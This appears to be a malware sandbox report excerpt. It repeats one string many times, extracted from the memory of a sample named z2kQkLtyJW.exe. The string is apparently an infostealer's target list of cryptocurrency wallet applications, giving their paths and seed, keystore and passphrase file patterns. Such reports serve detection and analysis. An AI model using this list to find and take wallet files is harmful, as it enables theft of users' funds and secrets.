Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
